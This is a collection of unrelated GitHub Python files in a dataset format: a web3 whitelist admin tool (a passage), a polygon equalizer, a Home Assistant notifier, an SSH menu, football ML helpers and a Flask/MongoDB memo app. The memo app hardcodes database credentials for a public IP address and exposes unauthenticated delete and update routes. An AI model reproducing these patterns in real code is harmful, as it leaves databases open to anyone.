address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n register_node_data = whitelist.encodeABI(fn_name='register',\n args=[Web3.toChecksumAddress(new_node_address), new_node_mask, new_node_reference])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': register_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. 
Unable to register node {}, {}\".format(new_node_address, new_node_reference))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef register_full_transaction(signer_address, server_address, client_address, signer_mask, reader_mask,\n reference, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n register_node_data = whitelist.encodeABI(fn_name='registerFull',\n args=[Web3.toChecksumAddress(signer_address),\n Web3.toChecksumAddress(server_address),\n Web3.toChecksumAddress(client_address),\n signer_mask, reader_mask, reference])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': register_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. Unable to register node:\\n\"\n \"{}, {}, {} - {}\".format(signer_address, server_address, client_address, reference))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef get_transaction_status(transaction_hash, timeout):\n try:\n txn_receipt = w3.eth.waitForTransactionReceipt(transaction_hash, timeout)\n except Exception:\n return {'status': 'failed', 'error': 'timeout'}\n else:\n return {'status': 'success', 'receipt': txn_receipt}\n\n\ndef main():\n welcome_message()\n read_config_files()\n init_vars()\n test_whitelist()\n check_status()\n user_dialog()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "KartelAG/stend-utils", "sub_path": "masterchain/whitelist-utils/common-setup/WhitelistManagement.py", "file_name": "WhitelistManagement.py", "file_ext": "py", "file_size_in_byte": 17753, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "web3.Web3", "line_number": 11, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 32, "usage_type": "call"}, {"api_name": "web3.IPCProvider", "line_number": 32, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "json.load", "line_number": 60, "usage_type": "call"}, {"api_name": "json.load", "line_number": 61, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 71, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 71, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 77, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 81, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 81, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 114, "usage_type": 
"call"}, {"api_name": "getpass.getpass", "line_number": 139, "usage_type": "call"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 141, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 141, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 160, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 160, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 163, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 163, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 166, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 166, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 167, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 167, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 168, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 168, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 328, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 328, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 330, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 330, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 336, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 336, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 338, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 338, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 339, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 339, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 340, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 340, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 354, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 354, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 356, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 356, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 362, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 362, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 364, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 364, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 365, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 365, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 366, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 366, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 381, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 381, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 383, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 383, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 389, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 389, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 390, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 390, "usage_type": "name"}, {"api_name": 
"web3.Web3.toChecksumAddress", "line_number": 391, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 391, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 394, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 394, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 395, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 395, "usage_type": "name"}, {"api_name": "web3.Web3.toChecksumAddress", "line_number": 396, "usage_type": "call"}, {"api_name": "web3.Web3", "line_number": 396, "usage_type": "name"}]} +{"seq_id": "30150150502", "text": "\"\"\"Merge and/or split polygons so that their surface area closely matches the target figure.\n\nIf a polygon is larger than target_area and subdivisions are available,\nit is split into its subdivisions, which are reaggregated into compact shapes\nto match target_area. If a polygon is smaller than target_area, it is\naggregated with its neighbors.\nThe criterion being minimized is ``abs(1 - area / target_area)``.\n\nAn interface to ``mobilib.area.equalize_polygons``.\n\"\"\"\n\nimport geopandas as gpd\n\nimport mobilib.area\nimport mobilib.argparser\nimport mobilib.core\n\nparser = mobilib.argparser.default(__doc__, areas=True)\nparser.add_argument('-s', '--subdiv-file',\n help='areas to use as subdivisions of equalized areas as a GDAL-compatible polygon file'\n)\nparser.add_argument('-t', '--target-area', type=float,\n help='target area to approximate by the output polygons'\n)\nparser.add_argument('-p', '--subdiv-poly-id-col',\n help='column in the subdivisions file mapping to area IDs'\n)\nparser.add_argument('-u', '--unsafe-geom', action='store_true',\n help='the geometries of areas and subdivisions do not perfectly align, compensate for that'\n)\nparser.add_argument('out_file',\n help='path to output the GDAL-compatible polygon layer with areas equalized'\n)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n areas = gpd.read_file(args.area_file).set_index(args.area_id_col)\n subdiv_geom = None\n subdiv_poly_ids = None\n if args.subdiv_file:\n subdivs = gpd.read_file(args.subdiv_file)\n subdiv_geom = subdivs.geometry\n if args.subdiv_poly_id_col:\n subdiv_poly_ids = subdivs[args.subdiv_poly_id_col]\n areas_eq, id_mapping = mobilib.area.equalize_polygons(\n areas.geometry,\n subdivisions=subdiv_geom,\n unsafe_geom=args.unsafe_geom,\n )\n mobilib.core.write_gdf(gpd.GeoDataFrame(geometry=areas_eq), args.out_file)\n", "repo_name": "simberaj/mobilib", "sub_path": "equalize_polygons.py", "file_name": "equalize_polygons.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "mobilib.area.argparser.default", "line_number": 18, "usage_type": "call"}, {"api_name": "mobilib.area.argparser", "line_number": 18, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 18, "usage_type": "name"}, {"api_name": "geopandas.read_file", "line_number": 37, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 41, "usage_type": "call"}, {"api_name": "mobilib.area.area.equalize_polygons", "line_number": 45, "usage_type": "call"}, {"api_name": "mobilib.area.area", "line_number": 45, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 45, "usage_type": "name"}, {"api_name": "mobilib.area.core.write_gdf", "line_number": 50, "usage_type": "call"}, {"api_name": "mobilib.area.core", 
"line_number": 50, "usage_type": "attribute"}, {"api_name": "mobilib.area", "line_number": 50, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "8973146845", "text": "import logging\r\nimport voluptuous as vol\r\nimport requests\r\nimport homeassistant.helpers.config_validation as cv\r\nfrom homeassistant.components.notify import (\r\n ATTR_TARGET, ATTR_TITLE, PLATFORM_SCHEMA, BaseNotificationService)\r\n\r\nCONF_URL = 'url'\r\nCONFIG_NICKNAME = 'nickname'\r\nCONFIG_TOKEN = 'token'\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\r\n vol.Required(CONF_URL): cv.string,\r\n vol.Required(CONFIG_NICKNAME): cv.string,\r\n vol.Optional(CONFIG_TOKEN): cv.string,\r\n}, extra=vol.ALLOW_EXTRA)\r\n\r\ndef get_service(hass, config, discovery_info=None):\r\n \"\"\"Get the custom notifier service.\"\"\"\r\n url = config.get(CONF_URL)\r\n nickname = config.get(CONFIG_NICKNAME)\r\n token = config.get(CONFIG_TOKEN)\r\n return MatterNotificationService(url,nickname,token)\r\n\r\nclass MatterNotificationService(BaseNotificationService):\r\n def __init__(self, url, nickname, token=None):\r\n self._url = url\r\n self.nickname = nickname\r\n self.token = token\r\n \r\n def send_message(self, message=\"\", **kwargs):\r\n title = kwargs.get(ATTR_TITLE)\r\n gateway = kwargs.get(ATTR_TARGET)\r\n \r\n data = {\r\n \r\n \"text\": \"*\" + title + \"* \\n\" + message,\r\n \"gateway\": str(gateway[0]),\r\n \"username\": self.nickname\r\n }\r\n try:\r\n if self.token is None:\r\n response = requests.post(self._url, json=data)\r\n else:\r\n headers = {\"Authorization\": \"Bearer \" + self.token} \r\n response = requests.post(self._url, json=data,headers = headers)\r\n _LOGGER.info(\"Message sent\")\r\n response.raise_for_status()\r\n except requests.exceptions.RequestException as ex:\r\n _LOGGER.error(\"Error sending notification using matterbridge: %s\", ex)", "repo_name": "t0mer/matterbridge-custom-notifier", "sub_path": "custom_components/matterbridge/notify.py", "file_name": "notify.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "homeassistant.components.notify.PLATFORM_SCHEMA", "line_number": 13, "usage_type": "name"}, {"api_name": "homeassistant.components.notify.PLATFORM_SCHEMA.extend", "line_number": 13, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 14, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 15, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 16, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 14, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 14, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 15, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 15, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 16, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 16, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 17, "usage_type": "attribute"}, {"api_name": 
"homeassistant.components.notify.BaseNotificationService", "line_number": 26, "usage_type": "name"}, {"api_name": "homeassistant.components.notify.ATTR_TITLE", "line_number": 33, "usage_type": "argument"}, {"api_name": "homeassistant.components.notify.ATTR_TARGET", "line_number": 34, "usage_type": "argument"}, {"api_name": "requests.post", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 50, "usage_type": "attribute"}]} +{"seq_id": "25057399378", "text": "import urwid\n\nfrom urwid import AttrMap, Text, Frame, Overlay, ExitMainLoop, ListBox, Button, \\\n Divider, Padding, SolidFill, GridFlow, Pile, Filler\n\nchoice = None\n\npalette = [\n ('header', 'bold', ''),\n ('footer', 'standout', ''),\n ('reversed', 'standout', ''),\n]\n\ndef start(config):\n \"\"\"Start the application and handle user input. Blocks until the application exits.\"\"\"\n\n def item_chosen(button, server):\n global choice\n choice = server\n response = Text([u'Connecting to: ', server.connection_string(), u'\\n'])\n done = Button(u'Ok')\n urwid.connect_signal(done, 'click', exit_program)\n main.original_widget = Filler(Pile([response, AttrMap(done, None, focus_map='reversed')]))\n\n def exit_program(button):\n raise urwid.ExitMainLoop()\n\n def unhandled(key):\n vim_map = {'h': 'left', 'j': 'down', 'k': 'up', 'l': 'right'}\n if key in vim_map.keys():\n list_box.keypress((0,1), vim_map[key])\n elif key in ['left', 'right']:\n pass\n elif key in ['esc', 'q']:\n raise ExitMainLoop()\n\n body = [urwid.Text(u'\\nServers'), Divider(u'-')]\n\n for server in config.get_servers():\n button = Button(server.name)\n urwid.connect_signal(button, 'click', item_chosen, server)\n body.append(AttrMap(button, None, focus_map='reversed'))\n\n list_box = ListBox(urwid.SimpleFocusListWalker(body))\n\n main = Padding(list_box, left=2, right=2)\n\n overlay = Overlay(main, SolidFill(u'\\N{MEDIUM SHADE}'),\n align='center', width=('relative', 60),\n valign='middle', height=('relative', 60),\n min_width=20, min_height=9)\n\n header = AttrMap(Text(u' ssh-menu'), 'header')\n footer = AttrMap(Text(u'this is the footer'), 'footer')\n\n frame = Frame(overlay, header=header, footer=footer)\n\n urwid.MainLoop(urwid.AttrMap(frame, 'body'), palette=palette, unhandled_input=unhandled).run()\n\n return choice\n", "repo_name": "acrisci/ssh-menu", "sub_path": "ssh-menu/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "urwid.Text", "line_number": 20, "usage_type": "call"}, {"api_name": "urwid.Button", "line_number": 21, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 22, "usage_type": "call"}, {"api_name": "urwid.Filler", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.Pile", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 23, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 35, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 37, "usage_type": "call"}, {"api_name": "urwid.Divider", "line_number": 37, "usage_type": "call"}, {"api_name": "urwid.Button", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 41, "usage_type": "call"}, 
{"api_name": "urwid.AttrMap", "line_number": 42, "usage_type": "call"}, {"api_name": "urwid.ListBox", "line_number": 44, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 44, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 46, "usage_type": "call"}, {"api_name": "urwid.Overlay", "line_number": 48, "usage_type": "call"}, {"api_name": "urwid.SolidFill", "line_number": 48, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 54, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 56, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 58, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "14307535384", "text": "import pandas as pd\ndf_pw = pd.read_excel('C:/Users/tobia/OneDrive/Desktop/PW_File.xlsx')\npath = df_pw['Ordner_Test'].iloc[0]\n\n\nimport pandas as pd\nimport numpy as np\n\nfrom sqlalchemy import create_engine\nfrom numpy import array\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nimport Read_Load_Database as db\n\n\ndef get_pw_db():\n df_pw = pd.read_excel('D:/Projects/PW_File.xlsx')\n pw = df_pw['Database'].iloc[0]\n \n return pw\n\n\ndef delete(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n conn.execute(query)\n\ndef execute(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n conn.execute(query)\n\ndef connection(query):\n \n pw = get_pw_db()\n conn = create_engine('mysql+pymysql://root:'+pw+'@localhost/prod_football')\n df = pd.read_sql(query, con = conn) \n\n return df\n \ndef get_data(var):\n \n df = db.get_test_query('bl1_prod_full', 'bl1_data_ergebnisse_kategorisiert') \n df = df.sort_values(by = 'Date')\n print(\"Nbr of rows before drop nan :\")\n print(len(df))\n print(\" \")\n df = df.dropna()\n print(\"Nbr of rows after drop nan :\")\n print(\" \")\n print(len(df))\n X = df[var]\n y = df['Spiel_Ausgang']\n\n if (('Heimmannschaft_ID') in var) or (('Trainer_ID') in var) or (('Gegner_Trainer_ID') in var) or (('HeimSystem') in var):\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2) \n X_train_array = encode_test_training_set(X_train, X_test, var)\n y_train_array = y_train.values.ravel()\n\n else:\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2) \n X_train_array, y_train_array = X_train.values, y_train.values.ravel()\n \n return X_train_array, y_train_array, X_train \n\n\ndef encode_variable(df, variable):\n \n data = df[variable]\n df = df.drop([variable], axis = 1)\n values = array(data)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n \n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n \n return df, onehot_encoded\n\ndef encode_variable_train_and_test(df_train, df_test, variable):\n \n data_train = df_train[variable]\n data_test = df_test[variable]\n \n df_train = df_train.drop([variable], axis = 1)\n df_test = df_test.drop([variable], axis = 1)\n \n values_train = 
array(data_train)\n    values_test = array(data_test) \n    \n    label_encoder = LabelEncoder()\n    \n    integer_encoded_train = label_encoder.fit_transform(values_train)\n    integer_encoded_test = label_encoder.transform(values_test)\n    \n    onehot_encoder = OneHotEncoder(sparse=False)\n    integer_encoded_train = integer_encoded_train.reshape(len(integer_encoded_train), 1)\n    integer_encoded_test = integer_encoded_test.reshape(len(integer_encoded_test), 1)\n    \n    \n    onehot_encoded_train = onehot_encoder.fit_transform(integer_encoded_train)\n    onehot_encoded_test = onehot_encoder.transform(integer_encoded_test)\n    \n    return df_train, df_test, onehot_encoded_train, onehot_encoded_test\n\n\ndef encode_test_training_set(df_train, df_test, variables):\n    \n    if 'Verein_Trainer_ID' in variables:\n        \n        df_train, teams_encoded_train = encode_variable(df_train, 'Verein_Trainer_ID')\n        df_train, away_teams_encoded_train = encode_variable(df_train, 'Away_Verein_Trainer_ID')\n        \n        teams_encoded_train = np.concatenate((teams_encoded_train, away_teams_encoded_train), axis=1)\n        \n        if 'HeimSystem' in variables:\n            df_train, home_system_encoded_train = encode_variable(df_train, 'HeimSystem')\n            df_train, away_system_encoded_train = encode_variable(df_train, 'AuswärtsSystem')\n            \n            system_encoded_train = np.concatenate((home_system_encoded_train, away_system_encoded_train), axis=1)\n\n        \n        \n        if (('Verein_Trainer_ID' in variables) and ('HeimSystem' in variables)):\n            \n            all_encoded_variables_train = np.concatenate((teams_encoded_train, system_encoded_train), axis=1)\n            \n        \n        if (('Verein_Trainer_ID' in variables) and ('HeimSystem' not in variables)):\n            \n            all_encoded_variables_train = teams_encoded_train\n            \n        \n        if (('Verein_Trainer_ID' not in variables) and ('HeimSystem' in variables)):\n            \n            all_encoded_variables_train = system_encoded_train\n        \n        \n    else:\n        \n        if 'Heimmannschaft_ID' in variables:\n            \n            df_train, home_teams_encoded_train = encode_variable(df_train, 'Heimmannschaft_ID')\n            df_train, away_teams_encoded_train = encode_variable(df_train, 'Gegner_ID')\n            teams_encoded_train = np.concatenate((home_teams_encoded_train, away_teams_encoded_train), axis=1)\n            \n        \n        if 'Trainer_ID' in variables:\n            \n            df_train, home_trainer_encoded_train = encode_variable(df_train, 'Trainer_ID')\n            df_train, away_trainer_encoded_train = encode_variable(df_train, 'Gegner_Trainer_ID')\n            trainer_encoded_train = np.concatenate((home_trainer_encoded_train, away_trainer_encoded_train), axis=1)\n            \n        \n        if 'HeimSystem' in variables:\n            \n            df_train, home_system_encoded_train = encode_variable(df_train, 'HeimSystem')\n            df_train, away_system_encoded_train = encode_variable(df_train, 'AuswärtsSystem')\n            system_encoded_train = np.concatenate((home_system_encoded_train, away_system_encoded_train), axis=1)\n        \n        \n        if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' in variables) and ('HeimSystem' in variables)):\n            \n            all_encoded_variables_train = np.concatenate((teams_encoded_train, trainer_encoded_train, system_encoded_train), axis=1)\n            \n        \n        if (('Heimmannschaft_ID' in variables) and ('HeimSystem' in variables) and ('Trainer_ID' not in variables)):\n            \n            all_encoded_variables_train = np.concatenate((teams_encoded_train, system_encoded_train), axis=1)\n            \n        \n        if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' in variables) and ('HeimSystem' not in variables)):\n            \n            all_encoded_variables_train = np.concatenate((teams_encoded_train, trainer_encoded_train), axis=1)\n            \n        \n        if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' in variables) and ('HeimSystem' in variables)):\n            \n            all_encoded_variables_train = np.concatenate((system_encoded_train, trainer_encoded_train), axis=1)\n            \n        \n        if (('Heimmannschaft_ID' in variables) and ('Trainer_ID' not in variables) and ('HeimSystem' not in variables)):\n            \n            all_encoded_variables_train = teams_encoded_train\n            \n        \n        if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' in variables) and ('HeimSystem' not in variables)):\n            \n            all_encoded_variables_train = trainer_encoded_train\n            \n        \n        if (('Heimmannschaft_ID' not in variables) and ('Trainer_ID' not in variables) and ('HeimSystem' in variables)):\n            \n            all_encoded_variables_train = system_encoded_train\n        \n\n    \n    
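# Editor's note (a sketch, not the author's code): the combination checks above could be\n    # collapsed by initialising each encoding to None, collecting the non-None encodings in\n    # a list parts, and calling np.concatenate(parts, axis=1) once.\n    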
x_variables = df_train.values\n    x_variables = np.concatenate((x_variables, all_encoded_variables_train), axis=1)\n    \n    \n    return x_variables", "repo_name": "TobiasLiedtke/project_football", "sub_path": "PROD/Test/Tools.py", "file_name": "Tools.py", "file_ext": "py", "file_size_in_byte": 7870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_excel", "line_number": 2, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 40, "usage_type": "call"}, {"api_name": "Read_Load_Database.get_test_query", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 77, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "7076468287", "text": "from flask import Flask, render_template, jsonify, request\n\napp = Flask(__name__)\nfrom pymongo import MongoClient\n\nclient = MongoClient('mongodb://test:test@13.124.220.19', 27017)\ndb = client.dbjungle\n\ncardID = 0  # module-level counter used when saving new cards\n\n## Part that serves the HTML\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n\n@app.route('/memo', methods=['GET'])\ndef listing():\n    # 1. Find every document & exclude the _id value from the output\n    result = list(db.posts.find({}, {'_id': 0}))\n    # 2. Return the records under the key named 'posts'\n    return jsonify({'result': 'success', 'posts': result})\n\n\n## Part that acts as the API\n@app.route('/memo', methods=['POST'])\ndef saving():\n    # 1. Receive the data from the client\n    url_receive = request.form['url_give']\n    comment_receive = request.form['comment_give']\n    global cardID\n    cardID = cardID + 1\n\n    article = {'url': url_receive, 'comment': comment_receive, 'cardID': cardID}\n    # 3. Insert the data into MongoDB\n    db.posts.insert_one(article)\n    return jsonify({'result': 'success', 'msg': 'POST connected!'})\n
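\n# Editor's note: a hedged alternative for the ID scheme above (a sketch, not the author's\n# code); deriving the next cardID from the collection survives restarts, assuming pymongo >= 3.7:\n#   cardID = db.posts.count_documents({}) + 1\n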
"usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "5188182526", "text": "\"\"\"\nDriver code for mass benchmark\n\"\"\"\nimport json\nimport random\nfrom typing import Any, DefaultDict\n\nimport matplotlib.pyplot as plt # type: ignore\n\nimport benchmark\nfrom graph import Graph\n\n\nclass Bcolors:\n \"\"\"\n Helper class for adding colors to prints\n https://svn.blender.org/svnroot/bf-blender/trunk/blender/build_files/scons/tools/Bcolors.py\n \"\"\"\n\n HEADER = \"\\033[95m\"\n OKBLUE = \"\\033[94m\"\n OKCYAN = \"\\033[96m\"\n OKGREEN = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n ENDC = \"\\033[0m\"\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n 